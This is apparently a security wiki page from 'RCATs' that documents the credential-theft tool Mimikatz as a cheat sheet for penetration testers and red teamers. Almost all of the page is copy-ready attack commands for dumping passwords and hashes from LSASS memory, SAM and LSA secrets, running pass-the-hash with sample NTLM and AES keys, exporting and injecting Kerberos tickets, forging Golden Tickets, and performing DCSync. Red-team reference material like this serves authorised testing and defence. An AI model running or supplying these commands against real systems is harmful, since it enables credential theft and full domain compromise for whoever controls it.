Mimikatz

From RCATs

Description

Mimikatz[1] is a tool that is primarily used for reading and extracting plaintext passwords, hashes, and other credentials from memory. It is often used by penetration testers and red teamers to gain access to sensitive data and systems. Additionally, it can also be used to perform other tasks such as generating Kerberos tickets, and extracting digital certificates.

Links:

https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49

Commands

sekurlsa

# Command is used to extract logon passwords from the Windows Security Support Provider (SSP)
sekurlsa::logonpasswords 

# Command will extract all logon passwords, including those of network connections.
sekurlsa::logonPasswords full

# Command will export Kerberos tickets to a file.
sekurlsa::tickets /export 

# Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

# This command will list and export Kerberos tickets to a file.
kerberos::list /export

# This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT.
kerberos::ptt c:\chocolate.kirbi

# This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system.
crypto::capi

# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system.
crypto::cng

# This command is used to export certificates from a Windows system.
crypto::certificates /export 

# This command is used to export certificates from the local machine certificate store of a Windows system.
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

# This command is used to export cryptographic keys from a Windows system.
crypto::keys /export

# This command is used to export cryptographic keys from the local machine of a Windows system.
crypto::keys /machine /export

vault & lsadump

Extracts credentials from the Windows Vault.
vault::cred

Lists the contents of the Windows Vault.
vault::list

Elevates the current user's privileges to that of the Local System account.
token::elevate

Reverts the current user's privileges to their previous state before elevation.
token::revert

Dumps the Security Account Manager (SAM) database, which stores local user account information.
lsadump::sam

Dumps the secrets stored in the Local Security Authority (LSA) of a Windows system.
lsadump::secrets

Dumps the LSA secrets cache, which contains recently used authentication information.
lsadump::cache

Perform a DCSync attack, which is used to replicate Active Directory data from a domain controller.
lsadump::dcsync /user:domain\krbtgt /domain:lab.local

PTH

# Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a

# Attempts to authenticate as the specified user with the provided AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

# Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

# Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe.
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe

ekeys

# Extracts EKEYS (Encrypted Key) keys from the Local Security Authority Subsystem Service (LSASS) process memory.
sekurlsa::ekeys

dapi

# Extracts Data Protection API (DPAPI) credentials from the LSASS process memory.
sekurlsa::dpapi

minidump

# Extracts information from a memory dump of the LSASS process.
sekurlsa::minidump lsass.dmp

PTT

#Impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system.
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

Golden & Silver Tickets

#Create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain.
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi

tgt

# Extracts Kerberos TGTs from the LSASS process memory.
kerberos::tgt

# Removes TGTs from memory.
kerberos::purge

References

  1. https://github.com/ParrotSec/mimikatz
Retrieved from "https://rcats.dev/rcats/index.php?title=Mimikatz&oldid=919"